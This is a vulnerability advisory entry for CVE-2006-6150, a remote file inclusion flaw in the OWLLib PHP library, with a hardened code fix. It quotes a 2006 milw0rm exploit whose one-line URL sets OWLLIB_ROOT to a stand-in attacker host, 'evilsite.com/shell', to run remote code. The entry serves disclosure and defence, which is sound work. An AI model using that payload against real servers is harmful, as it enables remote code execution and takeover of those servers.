OWLLib OWLLIB_ROOT Parameter File Inclusion Vulnerability

Vulnerability ID 1111646 Vulnerability type Input validation
Published 2006-11-23 Updated 2006-11-29
CVE ID CVE-2006-6150 CNNVD ID CNNVD-200611-447
Platform PHP CVSS score 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/2839
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-447
|Vulnerability details
OWLLib is a PHP function library for accessing OWL files. OWLLib contains an input validation vulnerability in its handling of user requests; a remote attacker may exploit it to execute arbitrary commands on the server with the privileges of the web process. The file owllib/memory/OWLMemoryProperty.php in OWLLib does not properly validate the OWLLIB_ROOT parameter, allowing an attacker to include arbitrary local or remote resources and thereby execute arbitrary instructions. The relevant code is: require_once"$OWLLIB_ROOT/OWLProperty.php";require_once"$OWLLIB_ROOT/memory/OWLMemoryClass.php"; A successful attack requires register_globals to be enabled.
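The root cause above is that $OWLLIB_ROOT is a plain global that register_globals lets a request parameter populate before it reaches require_once. As an added illustration (not OWLLib's own code), the following hardened header for owllib/memory/OWLMemoryProperty.php derives the library root from the file's own location, pins it as a constant that no request variable can overwrite, and refuses anything that is not a local directory containing the expected file:

```php
<?php
// Added example, not part of OWLLib: a hardened replacement for the
// vulnerable header of owllib/memory/OWLMemoryProperty.php.
// The original used require_once "$OWLLIB_ROOT/...", where $OWLLIB_ROOT
// could be supplied by the request when register_globals is on.

if (!defined('OWLLIB_ROOT')) {
    // memory/ sits one level below the owllib root, so resolve "..".
    // realpath() normalises the path and returns false if it does not exist.
    $owllibRoot = realpath(dirname(__FILE__) . '/..');
    if ($owllibRoot === false) {
        die('OWLLib: cannot resolve library root');
    }
    // A constant lives in a separate namespace from globals, so a
    // request parameter named OWLLIB_ROOT cannot replace it even with
    // register_globals enabled.
    define('OWLLIB_ROOT', $owllibRoot);
}

// Defensive checks: reject stream-wrapper URLs (http://, ftp://, php://)
// and any root that is not a local directory holding OWLProperty.php.
if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', OWLLIB_ROOT)
    || !is_dir(OWLLIB_ROOT)
    || !is_file(OWLLIB_ROOT . '/OWLProperty.php')) {
    die('OWLLib: invalid library root');
}

// Only a validated, locally resolved path ever reaches require_once.
require_once OWLLIB_ROOT . '/OWLProperty.php';
require_once OWLLIB_ROOT . '/memory/OWLMemoryClass.php';
```

Disabling register_globals and allow_url_include in php.ini closes the same hole at the configuration level, but the code above does not depend on either setting.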
|Vulnerability EXP
**********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name : owllib-src-1.0

* Class = Remote File Inclusion ;
 
* Download =http://heanet.dl.sourceforge.net/sourceforge/phpowllib/owllib-src-1.0.zip

* Found by = DeltahackingTEAM

* User In Delta Team (Dr.Pantagon )

* With the special thanks of my financial sponsor Tanha
----------------------------------------------------------------------------------------------------------
- Vulnerable Code

require_once "$OWLLIB_ROOT/OWLProperty.php";
require_once "$OWLLIB_ROOT/memory/OWLMemoryClass.php";
++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

    http://[target]/[path]/owllib/memory/OWLMemoryProperty.php?OWLLIB_ROOT=http://evilsite.com/shell?

***********************
I LOVE YOU G.Malake
***********************
----------------------------------------------------------------------------------------------------------
Greetz:Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc

# milw0rm.com [2006-11-23]
|References

Source: MILW0RM
Name: 2839
Link: http://www.milw0rm.com/exploits/2839
Source: VUPEN
Name: ADV-2006-4690
Link: http://www.frsirt.com/english/advisories/2006/4690
Source: SECUNIA
Name: 23079
Link: http://secunia.com/advisories/23079
Source: XF
Name: owllib-owlmemoryproperty-file-include(30531)
Link: http://xforce.iss.net/xforce/xfdb/30531
Source: BID
Name: 21268
Link: http://www.securityfocus.com/bid/21268
Source: MILW0RM
Name: 2839
Link: http://milw0rm.com/exploits/2839